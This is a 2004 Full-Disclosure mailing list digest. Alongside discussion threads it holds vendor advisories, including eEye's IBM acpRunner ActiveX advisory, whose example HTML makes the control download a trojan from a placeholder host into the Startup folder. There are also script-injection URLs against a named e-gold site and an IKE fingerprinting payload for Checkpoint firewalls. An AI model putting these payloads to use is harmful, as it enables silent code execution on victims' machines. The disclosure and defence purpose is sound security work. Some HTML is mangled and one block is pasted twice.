dangerous scripting. But, all we can write is what can be in a filename. Now, the second HTML page is called. What happens? The application throws an error, but before it crashes, it writes our exploit code to the file xx.hta. (It crashes because are not valid characters for a filename). So, now we have the exploit file in the exploit location with the exploit location within it... and the target system is taken down. Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: IBM has released a patch for this vulnerability. The patch is available at the following location: http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-5186 0 Credit: Discovery: Drew Copley Additional Research: [EMAIL PROTECTED] Related Links: Retina Network Security Scanner - Free 15 Day Trial http://www.eeye.com/html/products/retina/download/index.html Another Quote of the Day: A man's greatest work is to break his enemies, to drive them before him, to take from them all the things that have been theirs, to hear the weeping of those who cherished them. - Genghis Khan Copyright (c) 1998-2004 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall
Re: [Full-Disclosure] Akamai
Paul Schmehl wrote: If networks simply took responsibility for the traffic that comes from them, this problem wouldn't exist. Indeed. DNS's, AS's and what not else is required to make the internet tick; all is centrally controlled and delegated. What's missing is a flanking reverse of resposibilities. It's idiotic that providers or even full countries can completely ignore / reject any complaint without having their AS or DNS taken down. Unless networks begin doing this routinely (including ISPs), legislation will be introduced to solve the problem, and then we will all be much worse off. There's nothing like a law to completely screw things up. Amen! Peter ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: MAGIC XSS INTO THE DNS: coelacanth
-Original Message- From: Windows NTBugtraq Mailing List [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Tuesday, June 15, 2004 3:00 PM To: [EMAIL PROTECTED] Subject: MAGIC XSS INTO THE DNS: coelacanth Tuesday, June 15, 2004 The following courtesy of 'bitlance winter' adds an entirely new dimension to the matter and also suggest some additional peculiarities at play: a href='http://quot;gt;lt;plaintextgt;.e-gold.com'foo/a a href='http://quot;gt;lt;scriptgt;alert()lt;% 2Fscriptgt;.e-gold.com'foo/a these will inject arbitrary html and script into the site in the context of the 'intranet zone', which means one no longer needs to go out and setup a site with the dns issue, all one needs to do is locate a functioning site, include their code into a suitable url, either direct the target via that or place an iframe elsewhere pointing to it. Because the wildcarding is a bit too wild. For instance, http://money.e-gold.com/ resolves. And, http://money;G-MoneyOGbabyOG.e-gold.com/; resolves. In e-gold's case, they actually take the url line and render it variously in their dynamic html on their page. Still unclear how or why this can be interpreted into the site or through the browser. credit: 'bitlance winter' End Call -- http://www.malware.com - NTBugtraq Editor's Note: Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you''ll have to copy their email address out of the message and place it in your TO: field. - ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IBM acpRunner Activex Dangerous Methods Vulnerability
IBM acpRunner Activex Dangerous Methods Vulnerability Release Date: June 15, 2004 Date Reported: February 20, 2004 Patch Development Time (In Days): 116 Severity: High (Remote Code Execution) Vendor: IBM Systems Affected: acpRunner Activex Version 1.2.5.0 Overview: eEye Digital Security has discovered a security vulnerability in IBM's signed acpRunner activex. Because this application is signed, it might be presented to users on the web for execution in the name of IBM. If users trust IBM, they will run this, and their systems will be compromised. This activex was designed by IBM to be used for an automated support solution for their PC's. An unknown number of systems already have this activex on their systems. The issue is quite simple. Activex is a very profound web technology. As a profound web technology it may be abused. Designers might create an activex which could perform any function on an user's computer. Microsoft relies on trust for the security model and warns against making activex with dangerous capabilities. The responsibility, however, rests with the creator of the activex, as in any trust model. In this case, IBM made available methods named such as DownLoadURL, SaveFilePath, and Download. Almost needless to say, these methods allow a remote attacker to have a victim system silently download the file of their choosing into the location of their choosing. By downloading an executable file to the Startup folder, this malicious executable would be automatically executed on start up. Technical Details: ---EXAMPLE HTML- |object width=310 height=20 codebase=https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC ontrol.cab id=runner classid=CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3 data=DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA AAEQIAAA== |object| |script| runner.DownLoadURL = http://malicioussystem/trojan.exe;; runner.SaveFilePath = \..\\Start Menu\\Programs\\Startup; runner.FileSize = 96,857; runner.FileDate = 01/09/2004 3:33; runner.DownLoad(); |script| - In the above example, we see the object called utilizing the object tag. The codebase tag is used by the browser to initiate the install of the activex if it is not already existing on the system. This would bring up the activex prompt which essentially asks the user if they trust IBM. Finally, the object is named runner, so we might reference it later in script and use its' dangerous methods. In the script we see we access the dangerous methods of runner in a completely straightforward manner. The saveFilePath method uses a local url on the user's system which will accurately point to the user's startup folder. Finally, the method Download is called, and a progress meter shows the trojan file being downloaded to the exploit folder on the user's system. At restart, the OS would automatically run the trojan. Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: IBM has released a patch for this vulnerability. The patch is available at the following location: http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-5186 0 Credit: Discovery: [EMAIL PROTECTED] Additional Research: Drew Copley Related Links: Retina Network Security Scanner - Free 15 Day Trial http://www.eeye.com/html/products/retina/download/index.html Quotes of the Day: Fuggedboutit - the Cosa Nostra community as reported by Donnie Brasco (aka, Joe Pistone, FBI) You know what glamour is? It is fear. - The Krays (1981) Copyright (c) 1998-2004 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Akamai
Might as well toss in egress filtering to prvent many of the abuses of spoofing that happen in the present env of the internet. The ISP and others will claim that this is far too costly for their routers to handle, but, for the vast majority of sites, this is likely to not be as costly as the network folks are claiming as a way to avoid doing a tad bit more work in their router configs. Some of the worst sites for spoofing abuses, and those that have networkies that will complain the loudest, are the .edu's. Thanks, Ron DuFresne [SNIP] If networks simply took responsibility for the traffic that comes from them, this problem wouldn't exist. It's completely trivial to find infected hosts on a network through passive monitoring. They should then be disconnected until they are properly cleaned and secured. Unless networks begin doing this routinely (including ISPs), legislation will be introduced to solve the problem, and then we will all be much worse off. There's nothing like a law to completely screw things up. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Akamai
On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel [EMAIL PROTECTED] said: Indeed. DNS's, AS's and what not else is required to make the internet tick; all is centrally controlled and delegated. What's missing is a flanking reverse of resposibilities. It's idiotic that providers or even full countries can completely ignore / reject any complaint without having their AS or DNS taken down. In other arenas, they call the concept diplomatic immunity pgpR4PH0XXlZF.pgp Description: PGP signature
Re: [Full-Disclosure] spamming trojan?
On Wed, 2004-06-16 at 14:25, joe smith wrote: I used PE Explorer. Looks the june4.exe is some kind of spyware. It reference to another site cjdra.com, possibly uploading user information there. I just started learning assembly, please pardon my lack of knowledge on reverse engineering. J By chance, do you know of a similar tools that runs under linux? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] spamming trojan?
http://upx.sourceforge.net/#download Michael Gargiullo wrote: On Wed, 2004-06-16 at 14:25, joe smith wrote: I used PE Explorer. Looks the june4.exe is some kind of spyware. It reference to another site cjdra.com, possibly uploading user information there. I just started learning assembly, please pardon my lack of knowledge on reverse engineering. J By chance, do you know of a similar tools that runs under linux? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
File Source disclosure vulnerability in all web servers. Infohacking Security Advisory 04.16.04 www.infohacking.com Jun 16, 2004 I. BACKGROUND We discovered a very dangerous file source disclosure vulnerability in all webservers. This issue can be exploited using Microsoft Internet Explorer and probably other browsers. II. DESCRIPTION Remote explotation of this issue can be achived by clicking with the right button into the website and selecting the view source code option. This option will display the contents of the html code. For more leet explotation is also possible using lynx --source http://vulnerable.site/file.html III. ANALYSIS Successful exploitation allows an attacker to gain very very very sensible information of the website. IV. DETECTION Infohacking has confirmed that all webservers are vulnerable to this problem. Sites like microsoft, securityfocus, hack.co.za and others are vulnerable too! V. WORKAROUNDS No work.. indeed. VI. CVE INFORMATION This is an 0day bug... so still no bid and CVE. VII. DISCLOSURE TIMELINE 02/18/04 Hugo notified the bug to [EMAIL PROTECTED] 03/11/04 Initial vendor notification - no response 03/30/04 Secondary vendor notification - no response 05/20/04 We hack iberia.com 06/17/04 Public Disclosure VIII. CREDIT Hugo Vázquez Carapez http://www.infohacking.com/dirhugo.gif Get pwned by script kiddies? Call us, we can hack you again. IX. LEGAL NOTICES Copyright (c) 2004 INFOHACKING, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of INFOHACKING. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: Infohacking is pretty whitehat and lame. If you are a part of the blackhat communitie, please hack and remove us from the net Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services.php?subloc=messengerl=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about.php?subloc=affiliatel=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Checkpoint Firewall-1 IKE Vendor ID information leakage
So basically, the issue is that Checkpoint is following RFC 2408 (ISAKMP)? Specifically section 3.16: The Vendor ID Payload contains a vendor defined constant. The constant is used by vendors to identify and recognize remote instances of their implementations. This mechanism allows a vendor to experiment with new features while maintaining backwards compatibility. While perhaps this is unfortunate, it is clearly documented and I know that Brett Eldridge gave a talk on this specific issue at DefCon X. -Aaron On Wed, 16 Jun 2004 15:45:29 +0100, Roy Hills [EMAIL PROTECTED] wrote: Checkpoint Firewall-1 IKE Vendor ID information leakage Introduction: Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will return an IKE Vendor ID payload when it receives an IKE packet with a specific Vendor ID payload. The Vendor ID payload that is returned identifies the system as Checkpoint Firewall-1 and also determines the Firewall-1 version and service-pack or feature-pack revision number. This is an information leakage issue which can be used to fingerprint the Firewall-1 system. This information leakage issue has been verified for Checkpoint Firewall-1 versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1 version 4.0 is not vulnerable because it does not return any Vendor ID payload, and Firewall-1 versions 3.0b and earlier are not vulnerable because they do not support IPsec VPN. However, most people are running either NG or 4.1 and therefore this issue will apply to most Firewall-1 installations that have IPsec VPN enabled. I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover and demonstrate this issue. Full details are available at: http://www.nta-monitor.com/news/checkpoint2004/index.htm Details: If an IKE Phase-1 packet with a Vendor ID payload containing the data f4ed19e0c114eb516faaac0ee37daf2807b4381f (20 bytes of binary data encoded as hex) is sent to a Firewall-1 system running Firewall-1 v4.1 or higher which supports IKE, the Firewall will respond with a Vendor ID payload containing data which identifies it as a Checkpoint Firewall-1 system, provides details about the version of the Firewall software, and contains some additional information. The data that is returned in the Vendor ID payload from the Firewall consists of the same 20-byte sequence that was sent (f4ed19e0c114eb516faaac0ee37daf2807b4381f) followed by another 20-bytes of data that contains the encoded version number and some other details that appear to contain details of the Firewall's capabilities. I presume that the 20-byte magic string is an SHA1 hash of something. I'd be interested to find out what source string hashes to this value. Looking at all versions of Firewall-1 from 4.1 base (no service pack) to NG AI R55 (latest current version), I have found the following returned Vendor ID payloads. In the payloads below, a dot (.) represents an arbitary hex digit: Firewall-1 4.1 Base (no service pack) f4ed19e0c114eb516faaac0ee37daf2807b4381f00010002 Firewall-1 4.1 SP1 f4ed19e0c114eb516faaac0ee37daf2807b4381f00010003 Firewall-1 4.1 SP2-SP6 (SP2, 3, 4, 5, and 6 return the same Vendor ID) f4ed19e0c114eb516faaac0ee37daf2807b4381f00010fa2 [EMAIL PROTECTED] [537]$ [EMAIL PROTECTED] [537]$ [EMAIL PROTECTED] [537]$ [EMAIL PROTECTED] [537]$ cat ,, [Note to moderator: I notified Checkpoint of this issue on 13th April 2004, but have not received any response apart from a We've received your Email auto-reply.] Introduction: Checkpoint Firewall-1 version 4.1 and later with IPsec VPN enabled will return an IKE Vendor ID payload when it receives an IKE packet with a specific Vendor ID payload. The Vendor ID payload that is returned identifies the system as Checkpoint Firewall-1 and also determines the Firewall-1 version and service-pack or feature-pack revision number. This is an information leakage issue which can be used to fingerprint the Firewall-1 system. This information leakage issue has been verified for Checkpoint Firewall-1 versions from 4.1 (no service pack) to NG AI R55 inclusive. Firewall-1 version 4.0 is not vulnerable because it does not return any Vendor ID payload, and Firewall-1 versions 3.0b and earlier are not vulnerable because they do not support IPsec VPN. However, most people are running either NG or 4.1 and therefore this issue will apply to most Firewall-1 installations that have IPsec VPN enabled. I used ike-scan v1.6 (http://www.nta-monitor.com/ike-scan/) to discover and demonstrate this issue. Full details are available at: http://www.nta-monitor.com/news/checkpoint2004/index.htm Details: If an IKE Phase-1 packet with a Vendor ID payload containing the data f4ed19e0c114eb516faaac0ee37daf2807b4381f (20 bytes of binary data encoded as hex) is sent to
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
El martes 15 de junio a las 18:57, Syed Imran Ali escribió: about .co.uk is still allowing POP or not with 100MB, as it was with 6MB. .es still does, and they say it's not going to change, at least for a while. Regards. -- ** Las Penas del Agente Smith: http://chema.homelinux.org ** http://EuropeSwPatentFree.hispalinux.es - EuropeSwPatentFree GPG key ID: 0x2948FA19 | Please encrypt private mail signature.asc Description: Digital signature
Re: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers.
rofl, are you sure your not Bipin ? Subject: [Full-Disclosure] IFH-ADV-31337 File Source disclosure vulnerability in all web servers. File Source disclosure vulnerability in all web servers. Remote explotation of this issue can be achived by clicking with the right button into the website and selecting the view source code option. This option will display the contents of the html code. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Akamai
Yo! In other arenas, they call the concept diplomatic immunity Indeed. And is almost as idiotic there. But the issue is that the Internet does not have any reverse responsibility mechanism; an evil minor-player under a lax-average-provider can do whatever he feels that suits him best, and disregard majority opinion. An anarchy without even fundamental feedback regulatory mechanisms is simply prey; me paying for anothers fortune. And the least thing that would work is governments imposing their preferences. So maybe ICAN and the likes should consider some form of responsibility in these matters. Alas, Peter ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MS Anti Virus?
Oh this should be good... http://www.reuters.com/newsArticle.jhtml?storyID=5429092 SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile, Research) is still on track to offer an anti-virus product that will compete against similar software offered by Symantec Corp. (SYMC.O: Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote, Profile, Research) , the world's largest software maker said late on Monday. Mike Nash, chief of Microsoft's security business unit, told reporters that Microsoft is developing software to protect personal computers running Windows against malicious software, the worms and viruses that have plagued users with data loss, shutdowns and disruptions in Web traffic in recent years. We're still planning to offer our own AV (anti-virus) product, Nash said. Asked if that would hurt sales of competing products, such as Network Associates' McAfee and Symantec's Norton family of products, Nash said that Microsoft said that it would sell its anti-virus program as a separate product from Windows, rather than including it in Windows. Redmond, Washington-based acquired anti-virus technology from GeCAD Software Srl., a Romanian software company, last year to develop its own software. Microsoft, whose Windows operating system is a favorite target for computer viruses, launched a company-wide Trustworthy Computing campaign in early 2002 to boost the security and reliability of its software. Nash did not give a time frame for the release of Microsoft's anti-virus software. and another http://www.entmag.com/news/article.asp?EditorialsID=6272 by Scott Bekker 6/16/04 Microsoft is leaning toward offering a paid anti-virus subscription service. Mike Nash, corporate vice president for the security business and technology unit at Microsoft, said Microsoft will probably sell its own anti-virus software and subscription service. It is the first public signal that Microsoft intends to turn its acquisition of the Romanian anti-virus company GeCAD into a product customers pay for. The comments came up at a dinner with reporters in Seattle on Monday night when Nash was asked how Microsoft's anti-virus efforts might affect Symantec. I want to make sure customers have another choice, the Bloomberg News agency quoted Nash as saying. Some people will continue to use Symantec, and some will use ours. -- advertisement -- Shares of Symantec, which gets 85 percent of its revenues from anti-virus products, were down following Nash's comments, according to Bloomberg. Previously, Microsoft had been coy about its plans for GeCAD, which it acquired last June. This acquisition will help us and our partner anti-virus providers further mitigate risks from these threats, Nash said at the time, implying Microsoft would use GeCAD's programming talent to make Windows and other Microsoft products more resistant to viruses. But Microsoft also immediately indicated at the time that it was fully evaluating how to proceed with GeCAD's technology and employees. In a white paper published last June on Microsoft's Web site, the company wrote, Details of the Microsoft antivirus solution, including any product plans, pricing, and a timeline for delivery, are not yet available. Microsoft strongly recommends that customers continue to use antivirus solutions from industry partners and keep their virus signatures updated. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
Just think of all those l33t 0-days you can now have in your webmail!!! ;) This is definatly OT.. Andre Ludwig CISSP On Tue, 15 Jun 2004 11:42:10 -0500 (CDT), Ron DuFresne [EMAIL PROTECTED] wrote: The real questions fellows is though, what does any of this have to do with security, and who cares how much storage space your particular ISP or e-mail provider supplies? Thanks, Ron DuFresne On Tue, 15 Jun 2004, William Warren wrote: hrmm my yahoo account still shows 4.0 megs..do you have a paid account? Syed Imran Ali wrote: Hiya, It is nice to see my inbox today, having 100MB or storage space, 84% remaining. Yahoo now allows up to 10MB attachment too I am not sure about .co.uk is still allowing POP or not with 100MB, as it was with 6MB. Regards, S. Imran Ali ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- My Foundation verse: Isa 54:17 No weapon that is formed against thee shall prosper; and every tongue that shall rise against thee in judgment thou shalt condemn. This is the heritage of the servants of the LORD, and their righteousness is of me, saith the LORD. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MS Anti Virus?
Well they can't get a simple thing like a mail client right, they can't get a semi-simple thing like a browser right, they can't get not-so-simple thing like an operating system right, so let's branch out and fuck up some other things. No doubt a few years from now you'll see a line of food in the stores with their name on it. No doubt limited to doughnuts and pretzels. At least they can charge for a whole and the customer will insist on a portion. HOLE IN ONE ! gOLf cOURSEs next. -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS Anti Virus?
Think the mafia refers to this as a protection racket... man so much can be made of this its a techy comedy gold mine. our software sucks so bad that the market for anti virus software for our platform is such a lucrative market that we cant stay out of it Andre Ludwig CISSP On Wed, 16 Jun 2004 19:41:49 -0400, slacker [EMAIL PROTECTED] wrote: snip SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile, Research) is still on track to offer an anti-virus product that will compete against similar software offered by Symantec Corp. (SYMC.O: Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote, Profile, Research) , the world's largest software maker said late on Oh yeah, what's the average delay to release on exploit patches? What makes me think that they are going to be that slow on releasing AV updates? =P slacker ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
Did anyone else notice that they also raised the storage limit to 2Gb for paid account holders? (SBC Yahoo DSL and accounts like that, 19.99/mo) That's quite a lot of spam storage. Wanna talk about security? How about all those phishing and spam emails being stored (and potentially opened) for far longer than was possible before. Seems like a security problem waiting to happen. So far, in my Gmail account, I've had exactly 0 spam emails, and I have that address pasted all over the web. Either their spam filtering is incredible, or the spammers haven't picked it up yet. My Yahoo account, on the other hand, is 100% spam except for mailing list traffic. -Shawn Shawn Nunley, CISSP Director, Technology Development NetScaler, Inc. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
sorry, I meant to say 19.99/year, not per month for the 2gb storage limit. On Wed, 16 Jun 2004 18:28:44 -0700, Shawn Nunley [EMAIL PROTECTED] wrote: Did anyone else notice that they also raised the storage limit to 2Gb for paid account holders? (SBC Yahoo DSL and accounts like that, 19.99/mo) That's quite a lot of spam storage. Wanna talk about security? How about all those phishing and spam emails being stored (and potentially opened) for far longer than was possible before. Seems like a security problem waiting to happen. So far, in my Gmail account, I've had exactly 0 spam emails, and I have that address pasted all over the web. Either their spam filtering is incredible, or the spammers haven't picked it up yet. My Yahoo account, on the other hand, is 100% spam except for mailing list traffic. -Shawn Shawn Nunley, CISSP Director, Technology Development NetScaler, Inc. -- Shawn Nunley, CISSP Director, Technology Development NetScaler, Inc. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Akamai
On Wed, Jun 16, 2004 at 04:57:10PM -0400, [EMAIL PROTECTED] wrote: On Wed, 16 Jun 2004 21:26:45 +0200, Peter van den Heuvel [EMAIL PROTECTED] said: flanking reverse of resposibilities. It's idiotic that providers or even full countries can completely ignore / reject any complaint without having their AS or DNS taken down. In other arenas, they call the concept diplomatic immunity In those same arenas, they call the denial of privilege by an unrecognized entity (or entities) anarchy. Which is one of those things that sounds like a really good idea till you're no longer in the de facto majority. (They came for...) On Wed, Jun 16, 2004 at 12:23:35PM -0500, Paul Schmehl wrote: Unless networks begin doing this routinely (including ISPs), legislation will be introduced to solve the problem, and then we will all be much worse off. There's nothing like a law to completely screw things up. Actually, a clearly defined, limited, exact law is precisely what we need here. We just lack any appropriate legislative body. (No national legislature qualifies, and no international body--they exist: NATO, UN, EU--can make a plausible claim to jurisdiction.) -- gabriel rosenkoetter [EMAIL PROTECTED] pgp2aO0Kgofut.pgp Description: PGP signature
[Full-Disclosure] [SECURITY] [DSA 520-1] New krb5 packages fix buffer overflows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 520-1 [EMAIL PROTECTED] http://www.debian.org/security/ Matt Zimmerman June 16th, 2004 http://www.debian.org/security/faq - -- Package: krb5 Vulnerability : buffer overflows Problem-Type : remote Debian-specific: no CVE Ids: CAN-2004-0523 In their advisory MITKRB5-SA-2004-001, the MIT Kerberos announced the existence of buffer overflow vulnerabilities in the krb5_aname_to_localname function. This function is only used if aname_to_localname is enabled in the configuration (this is not enabled by default). For the current stable distribution (woody), this problem has been fixed in version 1.2.4-5woody5. For the unstable distribution (sid), this problem has been fixed in version 1.3.3-2. We recommend that you update your krb5 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody5.dsc Size/MD5 checksum: 750 88922316a5c4dc4f54eedfc8d1b2b21e http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4-5woody5.diff.gz Size/MD5 checksum:77079 1d99337aa5734ab47878c706c1cd16e7 http://security.debian.org/pool/updates/main/k/krb5/krb5_1.2.4.orig.tar.gz Size/MD5 checksum: 5443051 663add9b5942be74a86fa860a3fa4167 Architecture independent components: http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.2.4-5woody5_all.deb Size/MD5 checksum: 514592 b608f9f7c599049696daa569a9a9c95b Alpha architecture: http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_alpha.deb Size/MD5 checksum: 253392 39dace8011ec70211cafe7482a464bef http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_alpha.deb Size/MD5 checksum: 217158 2eec6d86a559c9bf151b06bb55916347 http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_alpha.deb Size/MD5 checksum:62608 6ad21c730aa61227f335042c83057e35 http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_alpha.deb Size/MD5 checksum: 251804 32c06efac81f7f875e993e7f6343ee10 http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_alpha.deb Size/MD5 checksum:76040 2e6e74208a9c7f401c23076d32e29d3d http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_alpha.deb Size/MD5 checksum:58704 897ad549370be37234179d87084012e9 http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_alpha.deb Size/MD5 checksum: 207166 60ec8f0d5f60af7e03f18d68bdd1bfc3 http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.2.4-5woody5_alpha.deb Size/MD5 checksum:83328 49d5415c510a3b16b0c7e6831d6295d1 http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.2.4-5woody5_alpha.deb Size/MD5 checksum: 632940 b5feb5c5d4ffb4dcc36607fb6c094ddd http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.2.4-5woody5_alpha.deb Size/MD5 checksum: 367114 1126cddacb3eb385c363cc24bd8ccf30 ARM architecture: http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.2.4-5woody5_arm.deb Size/MD5 checksum: 196910 00f2c6dc3b783b559418d3acaae9ccc4 http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.2.4-5woody5_arm.deb Size/MD5 checksum: 160204 6fbdbe00198ac08c127da7b605cb4401 http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.2.4-5woody5_arm.deb Size/MD5 checksum:48382 06c5be009cd9391342dfc97e18cc1c11 http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.2.4-5woody5_arm.deb Size/MD5 checksum: 198234 7a6fc77bf7307de8f5cb7ab203586e94 http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.2.4-5woody5_arm.deb Size/MD5 checksum:63316 8e5b77aaefc5319b730b24ebd39d4c6d http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.2.4-5woody5_arm.deb Size/MD5 checksum:48952 1c46d9156b91cfbe3bf2a7b2406c4d19 http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.2.4-5woody5_arm.deb Size/MD5 checksum: 165652
Re: [Full-Disclosure] MS Anti Virus?
I hate to say this, but I don't think Microsoft software could be any worse than Symantec... Andre Ludwig [EMAIL PROTECTED] wrote: Think the mafia refers to this as a protection racket... man so much can be made of this its a techy comedy gold mine. our software sucks so bad that the market for anti virus software for our platform is such a lucrative market that we cant stay out of it Andre Ludwig CISSP On Wed, 16 Jun 2004 19:41:49 -0400, slacker [EMAIL PROTECTED] wrote: snip SEATTLE (Reuters) - Microsoft Corp. (MSFT.O: Quote, Profile, Research) is still on track to offer an anti-virus product that will compete against similar software offered by Symantec Corp. (SYMC.O: Quote, Profile, Research) and Network Associates Inc. (NET.N: Quote, Profile, Research) , the world's largest software maker said late on Oh yeah, what's the average delay to release on exploit patches? What makes me think that they are going to be that slow on releasing AV updates? =P slacker ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- When it absolutely, positively had to be there yesterday: Temporal Express ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MS Anti Virus?
